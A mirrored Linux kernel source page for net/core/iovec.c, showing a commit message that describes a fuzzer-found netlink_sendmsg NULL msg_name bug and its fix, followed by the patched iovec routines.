mirror of
https://github.com/torvalds/linux.git
synced 2024-12-13 14:43:03 +00:00
40eea803c6
Sasha's report:
> While fuzzing with trinity inside a KVM tools guest running the latest -next
> kernel with the KASAN patchset, I've stumbled on the following spew:
>
> [ 4448.949424] ==================================================================
> [ 4448.951737] AddressSanitizer: user-memory-access on address 0
> [ 4448.952988] Read of size 2 by thread T19638:
> [ 4448.954510] CPU: 28 PID: 19638 Comm: trinity-c76 Not tainted 3.16.0-rc4-next-20140711-sasha-00046-g07d3099-dirty #813
> [ 4448.956823] ffff88046d86ca40 0000000000000000 ffff880082f37e78 ffff880082f37a40
> [ 4448.958233] ffffffffb6e47068 ffff880082f37a68 ffff880082f37a58 ffffffffb242708d
> [ 4448.959552] 0000000000000000 ffff880082f37a88 ffffffffb24255b1 0000000000000000
> [ 4448.961266] Call Trace:
> [ 4448.963158] dump_stack (lib/dump_stack.c:52)
> [ 4448.964244] kasan_report_user_access (mm/kasan/report.c:184)
> [ 4448.965507] __asan_load2 (mm/kasan/kasan.c:352)
> [ 4448.966482] ? netlink_sendmsg (net/netlink/af_netlink.c:2339)
> [ 4448.967541] netlink_sendmsg (net/netlink/af_netlink.c:2339)
> [ 4448.968537] ? get_parent_ip (kernel/sched/core.c:2555)
> [ 4448.970103] sock_sendmsg (net/socket.c:654)
> [ 4448.971584] ? might_fault (mm/memory.c:3741)
> [ 4448.972526] ? might_fault (./arch/x86/include/asm/current.h:14 mm/memory.c:3740)
> [ 4448.973596] ? verify_iovec (net/core/iovec.c:64)
> [ 4448.974522] ___sys_sendmsg (net/socket.c:2096)
> [ 4448.975797] ? put_lock_stats.isra.13 (./arch/x86/include/asm/preempt.h:98 kernel/locking/lockdep.c:254)
> [ 4448.977030] ? lock_release_holdtime (kernel/locking/lockdep.c:273)
> [ 4448.978197] ? lock_release_non_nested (kernel/locking/lockdep.c:3434 (discriminator 1))
> [ 4448.979346] ? check_chain_key (kernel/locking/lockdep.c:2188)
> [ 4448.980535] __sys_sendmmsg (net/socket.c:2181)
> [ 4448.981592] ? trace_hardirqs_on_caller (kernel/locking/lockdep.c:2600)
> [ 4448.982773] ? trace_hardirqs_on (kernel/locking/lockdep.c:2607)
> [ 4448.984458] ? syscall_trace_enter (arch/x86/kernel/ptrace.c:1500 (discriminator 2))
> [ 4448.985621] ? trace_hardirqs_on_caller (kernel/locking/lockdep.c:2600)
> [ 4448.986754] SyS_sendmmsg (net/socket.c:2201)
> [ 4448.987708] tracesys (arch/x86/kernel/entry_64.S:542)
> [ 4448.988929] ==================================================================
This reports means that we've come to netlink_sendmsg() with msg->msg_name == NULL and msg->msg_namelen > 0.
After this report there was no usual "Unable to handle kernel NULL pointer dereference"
and this gave me a clue that address 0 is mapped and contains valid socket address structure in it.
This bug was introduced in f3d3342602
(net: rework recvmsg handler msg_name and msg_namelen logic).
Commit message states that:
"Set msg->msg_name = NULL if user specified a NULL in msg_name but had a
non-null msg_namelen in verify_iovec/verify_compat_iovec. This doesn't
affect sendto as it would bail out earlier while trying to copy-in the
address."
But in fact this affects sendto when address 0 is mapped and contains
socket address structure in it. In such case copy-in address will succeed,
verify_iovec() function will successfully exit with msg->msg_namelen > 0
and msg->msg_name == NULL.
This patch fixes it by setting msg_namelen to 0 if msg_name == NULL.
Cc: Hannes Frederic Sowa <hannes@stressinduktion.org>
Cc: Eric Dumazet <edumazet@google.com>
Cc: <stable@vger.kernel.org>
Reported-by: Sasha Levin <sasha.levin@oracle.com>
Signed-off-by: Andrey Ryabinin <a.ryabinin@samsung.com>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
185 lines
4.1 KiB
C
185 lines
4.1 KiB
C
/*
|
|
* iovec manipulation routines.
|
|
*
|
|
*
|
|
* This program is free software; you can redistribute it and/or
|
|
* modify it under the terms of the GNU General Public License
|
|
* as published by the Free Software Foundation; either version
|
|
* 2 of the License, or (at your option) any later version.
|
|
*
|
|
* Fixes:
|
|
* Andrew Lunn : Errors in iovec copying.
|
|
* Pedro Roque : Added memcpy_fromiovecend and
|
|
* csum_..._fromiovecend.
|
|
* Andi Kleen : fixed error handling for 2.1
|
|
* Alexey Kuznetsov: 2.1 optimisations
|
|
* Andi Kleen : Fix csum*fromiovecend for IPv6.
|
|
*/
|
|
|
|
#include <linux/errno.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kernel.h>
|
|
#include <linux/mm.h>
|
|
#include <linux/net.h>
|
|
#include <linux/in6.h>
|
|
#include <asm/uaccess.h>
|
|
#include <asm/byteorder.h>
|
|
#include <net/checksum.h>
|
|
#include <net/sock.h>
|
|
|
|
/*
|
|
* Verify iovec. The caller must ensure that the iovec is big enough
|
|
* to hold the message iovec.
|
|
*
|
|
* Save time not doing access_ok. copy_*_user will make this work
|
|
* in any case.
|
|
*/
|
|
|
|
int verify_iovec(struct msghdr *m, struct iovec *iov, struct sockaddr_storage *address, int mode)
|
|
{
|
|
int size, ct, err;
|
|
|
|
if (m->msg_name && m->msg_namelen) {
|
|
if (mode == VERIFY_READ) {
|
|
void __user *namep;
|
|
namep = (void __user __force *) m->msg_name;
|
|
err = move_addr_to_kernel(namep, m->msg_namelen,
|
|
address);
|
|
if (err < 0)
|
|
return err;
|
|
}
|
|
m->msg_name = address;
|
|
} else {
|
|
m->msg_name = NULL;
|
|
m->msg_namelen = 0;
|
|
}
|
|
|
|
size = m->msg_iovlen * sizeof(struct iovec);
|
|
if (copy_from_user(iov, (void __user __force *) m->msg_iov, size))
|
|
return -EFAULT;
|
|
|
|
m->msg_iov = iov;
|
|
err = 0;
|
|
|
|
for (ct = 0; ct < m->msg_iovlen; ct++) {
|
|
size_t len = iov[ct].iov_len;
|
|
|
|
if (len > INT_MAX - err) {
|
|
len = INT_MAX - err;
|
|
iov[ct].iov_len = len;
|
|
}
|
|
err += len;
|
|
}
|
|
|
|
return err;
|
|
}
|
|
|
|
/*
|
|
* And now for the all-in-one: copy and checksum from a user iovec
|
|
* directly to a datagram
|
|
* Calls to csum_partial but the last must be in 32 bit chunks
|
|
*
|
|
* ip_build_xmit must ensure that when fragmenting only the last
|
|
* call to this function will be unaligned also.
|
|
*/
|
|
int csum_partial_copy_fromiovecend(unsigned char *kdata, struct iovec *iov,
|
|
int offset, unsigned int len, __wsum *csump)
|
|
{
|
|
__wsum csum = *csump;
|
|
int partial_cnt = 0, err = 0;
|
|
|
|
/* Skip over the finished iovecs */
|
|
while (offset >= iov->iov_len) {
|
|
offset -= iov->iov_len;
|
|
iov++;
|
|
}
|
|
|
|
while (len > 0) {
|
|
u8 __user *base = iov->iov_base + offset;
|
|
int copy = min_t(unsigned int, len, iov->iov_len - offset);
|
|
|
|
offset = 0;
|
|
|
|
/* There is a remnant from previous iov. */
|
|
if (partial_cnt) {
|
|
int par_len = 4 - partial_cnt;
|
|
|
|
/* iov component is too short ... */
|
|
if (par_len > copy) {
|
|
if (copy_from_user(kdata, base, copy))
|
|
goto out_fault;
|
|
kdata += copy;
|
|
base += copy;
|
|
partial_cnt += copy;
|
|
len -= copy;
|
|
iov++;
|
|
if (len)
|
|
continue;
|
|
*csump = csum_partial(kdata - partial_cnt,
|
|
partial_cnt, csum);
|
|
goto out;
|
|
}
|
|
if (copy_from_user(kdata, base, par_len))
|
|
goto out_fault;
|
|
csum = csum_partial(kdata - partial_cnt, 4, csum);
|
|
kdata += par_len;
|
|
base += par_len;
|
|
copy -= par_len;
|
|
len -= par_len;
|
|
partial_cnt = 0;
|
|
}
|
|
|
|
if (len > copy) {
|
|
partial_cnt = copy % 4;
|
|
if (partial_cnt) {
|
|
copy -= partial_cnt;
|
|
if (copy_from_user(kdata + copy, base + copy,
|
|
partial_cnt))
|
|
goto out_fault;
|
|
}
|
|
}
|
|
|
|
if (copy) {
|
|
csum = csum_and_copy_from_user(base, kdata, copy,
|
|
csum, &err);
|
|
if (err)
|
|
goto out;
|
|
}
|
|
len -= copy + partial_cnt;
|
|
kdata += copy + partial_cnt;
|
|
iov++;
|
|
}
|
|
*csump = csum;
|
|
out:
|
|
return err;
|
|
|
|
out_fault:
|
|
err = -EFAULT;
|
|
goto out;
|
|
}
|
|
EXPORT_SYMBOL(csum_partial_copy_fromiovecend);
|
|
|
|
unsigned long iov_pages(const struct iovec *iov, int offset,
|
|
unsigned long nr_segs)
|
|
{
|
|
unsigned long seg, base;
|
|
int pages = 0, len, size;
|
|
|
|
while (nr_segs && (offset >= iov->iov_len)) {
|
|
offset -= iov->iov_len;
|
|
++iov;
|
|
--nr_segs;
|
|
}
|
|
|
|
for (seg = 0; seg < nr_segs; seg++) {
|
|
base = (unsigned long)iov[seg].iov_base + offset;
|
|
len = iov[seg].iov_len - offset;
|
|
size = ((base & ~PAGE_MASK) + len + ~PAGE_MASK) >> PAGE_SHIFT;
|
|
pages += size;
|
|
offset = 0;
|
|
}
|
|
|
|
return pages;
|
|
}
|
|
EXPORT_SYMBOL(iov_pages);
|